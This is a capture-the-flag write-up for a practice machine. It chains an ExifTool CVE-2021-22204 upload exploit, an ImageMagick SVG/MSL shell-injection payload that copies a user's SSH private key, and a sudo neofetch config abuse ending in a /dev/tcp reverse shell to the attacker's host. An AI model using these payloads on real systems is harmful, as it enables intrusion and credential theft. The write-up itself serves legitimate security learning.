0x01 Introduction#
Target machine IP: 10.10.11.140.
Local machine IP: 10.10.16.6 (Mac M1).
0x02 Information Gathering#
A port scan shows that only ports 22 (SSH) and 80 (HTTP) are open.
Port 80 on 10.10.11.140 redirects to http://artcorp.htb/, which does not resolve. Add 10.10.11.140 artcorp.htb to the hosts file and try again.
gobuster vhost -u artcorp.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
The vhost scan turns up dev01.artcorp.htb (add it to the hosts file as well). Under http://dev01.artcorp.htb/metaview/ there is a file upload point.
Upload an image: the page returns the image's metadata, and a little fingerprinting shows that the output is exactly what exiftool produces, so the upload is being passed to ExifTool on the server.
0x03 Exploitation#
This is a Remote Code Execution vulnerability, CVE-2021-22204: ExifTool 7.44 through 12.23 executes arbitrary code when parsing a crafted DjVu file, because its DjVu annotation parser hands user-controlled data to Perl's eval. Because ExifTool re-parses certain embedded sub-documents, the DjVu payload can be carried inside an ordinary JPEG, which is what the public exploit does.
Exploit:
Building the malicious file needs exiftool and a few helper tools that are awkward to set up on macOS, so the rest is done from Kali.
Kali's IP is: 10.10.14.14.
Set the callback IP in the exploit to Kali's IP.
Run the exploit to generate image.jpg.
Start listening on Kali.
nc -nlvp 9090
Browse to http://dev01.artcorp.htb/metaview/ and upload the generated image.jpg. As soon as the server runs exiftool on it, the listener receives a shell.
Upgrade to a fully interactive terminal (either of the first two lines spawns a pty):
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
When reset asks for the terminal type, answer xterm.
0x04 Privilege Escalation#
The shell runs as www-data, which cannot read user.txt. Start with the usual enumeration, for example SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Running pspy64 to watch process activity shows a shell script, convert_images.sh, being executed periodically. Let's see what it contains.
The content is as follows:
mogrify is ImageMagick's in-place counterpart of convert: it resizes, blurs, crops, dithers or converts the images given on its command line and overwrites each original file (unless -format or -path sends the output elsewhere).
The technique comes from this article:
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
The idea: when ImageMagick reads a pdf: input it invokes Ghostscript through a shell command line, and the value of the authenticate attribute (the PDF password) is placed on that line unescaped, so backticks inside it are executed as a command. The MSL coder exposes that attribute, and an SVG can pull in an MSL document via an msl: reference. Saving the following as poc.svg (the name must match the msl:poc.svg self-reference) where the script's mogrify run will pick it up makes ImageMagick process the file first as SVG, then as MSL, and finally run the injected command, which copies thomas's private key to /dev/shm/key:
<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/key`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
Once the script has run, /dev/shm/key on the target holds the key on a single line, because echo $(cat ...) turns the original line breaks into spaces. Copy it to Kali as ~/.ssh/id_rsa, restore the line breaks (header line, base64 body wrapped as in the original, footer line) and set the permissions to 400, otherwise ssh refuses to use the file.
Then log in with the key to obtain user.txt:
ssh -i id_rsa thomas@10.10.11.140
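Rebuilding the key by hand is error-prone, so here is an added helper (not from the page) that restores a key flattened by echo $(cat ...): it cuts out the header and footer, which contain spaces of their own, strips the separators from the base64 body and re-wraps it at the width the format uses. It assumes the flattened text has been copied into a local file whose path is passed as the argument, and that the key is unencrypted and in OpenSSH or PEM format.

```shell
#!/bin/sh
# Added example: rebuild a private key that `echo $(cat id_rsa)` flattened to a
# single space-separated line. Assumes (not from the page) the flattened text was
# copied into a local file whose path is passed as $1.

restore_key() {
    flat=$(cat "$1")
    # Header and footer still contain their own spaces, so cut them out before
    # removing the separators from the base64 body.
    header="${flat%% PRIVATE KEY-----*} PRIVATE KEY-----"
    footer="-----END${flat##*-----END}"
    body="${flat#"$header"}"
    body="${body%"$footer"}"
    body=$(printf '%s' "$body" | tr -d ' \t\n')
    # OpenSSH-format keys are wrapped at 70 columns, PEM (RSA/EC) keys at 64.
    case "$header" in
        *OPENSSH*) width=70 ;;
        *)         width=64 ;;
    esac
    printf '%s\n' "$header"
    printf '%s\n' "$body" | fold -w "$width"
    printf '%s\n' "$footer"
}

# Usage: sh restore_key.sh flat_key.txt > ~/.ssh/id_rsa && chmod 400 ~/.ssh/id_rsa
if [ "$#" -eq 1 ]; then
    restore_key "$1"
fi
```

After writing the output to ~/.ssh/id_rsa, `ssh-keygen -l -f ~/.ssh/id_rsa` is a quick way to confirm that the reconstructed file parses before trying to log in.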
Next, escalate to root privilege.
Run sudo -l: thomas may execute the following as root without a password.
(root) NOPASSWD: /usr/bin/neofetch \"\"
Run the neofetch command, the effect is as follows:
GTFOBins (https://gtfobins.github.io/#neo) lists neofetch: when it can be run with sudo, its configuration file can be abused to escalate privileges.
Look at the sudo -l output again: XDG_CONFIG_HOME is kept in the environment (env_keep). neofetch sources its configuration file, $XDG_CONFIG_HOME/neofetch/config.conf, as bash code, so by pointing that variable at a directory we control and putting a reverse shell in the config, the shell is spawned as root when the sudo command runs.
The specific steps are as follows:
- Prepare a script for bouncing back a shell.
bash -c 'exec bash -i &>/dev/tcp/10.10.14.14/1234 <&1'
- Write it as the first line of /home/thomas/.config/neofetch/config.conf (create the directory and file if they do not exist yet).
- Import the environment variable.
export XDG_CONFIG_HOME="$HOME/.config"
- Start listening with nc.
nc -nlvp 1234
- Execute neofetch.
sudo -u root /usr/bin/neofetch \"\"
The listener receives a root shell; read root.txt.
0x05 Summary#
- Could not find a target machine for CVE-2021-22204 after searching for a long time, and some Docker environments had not been set up yet; this box happened to be the chance to learn how to exploit CVE-2021-22204.
- Learned about privilege escalation using ImageMagick.